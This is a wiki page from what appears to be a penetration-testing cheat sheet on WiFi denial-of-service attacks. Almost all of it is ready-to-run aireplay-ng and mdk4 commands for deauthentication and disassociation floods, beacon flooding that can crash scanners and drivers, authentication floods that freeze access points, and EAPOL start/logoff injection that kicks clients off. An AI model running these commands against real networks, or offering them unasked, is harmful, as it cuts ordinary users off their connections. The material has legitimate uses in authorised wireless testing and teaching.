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05. WiFi Denial of Service

Koutto edited this page Nov 1, 2020 · 1 revision

Deauthentication / Disassociation

  • Deauthentication Attack:
aireplay-ng --deauth 0 -c <MAC_target> -a <MAC_AP> mon0  # Infinite amount of deauth attacks
aireplay-ng --deauth 5 -c <MAC_target> -a <MAC_AP> mon0  # 5 deauth attacks
  • Deauthentication + Disassociation Attack:
mdk4 mon0 d -b <MAC_AP_file> -c <channel>  # MAC_AP_file stores MAC address of AP. All clients connected to the AP will be targeted
mdk4 mon0 d -c <channel> -b <victim_client_mac.txt> -E <SSID> -B <MAC_AP>  # victim_client_mac.txt contains MAC of device to disconnect
mdk4 mon0 d -c <channel> -E <SSID>  # Simple. Disconnect all clients connected on AP with SSID

Beacon Flooding

Generate many fake APs by sending lots of beacon frames -> Confuse clients, can crash network scanners & drivers

mdk4 mon0 b
mdk4 mon0 b -s 1000 	# Increased speed
mdk4 mon0 b -m -w ta	# Use valid AP MAC & only create WPA/WPA2 networks
mdk4 mon0 b -a -w nta -m
  • -a: Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
  • -w: n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
  • -m: Use real BSSIDS

Authentication DoS

Send authentication frames to all APs found in range -> Too many clients can freeze or reset several APs

mdk4 mon0 a -m
mdk4 mon0 a -m -a <MAC_AP>  # Only target specified AP (random data from random clients)
mdk4 mon0 a -m -i <MAC_AP>  # Only target specified AP + Intelligent test (capture & repeat data packet from connected clients)

EAPOL Start & Logoff Packet Injection

  • Flood AP with EAPOL Start frames to keep it busy with fake sessions -> disable handling of any legitimate clients:
mdk4 mon0 e -t <MAC_AP>
  • Inject fake EAPOL Logoff messages -> Kick clients from AP:
mdk4 mon0 e -t <MAC_AP> -l
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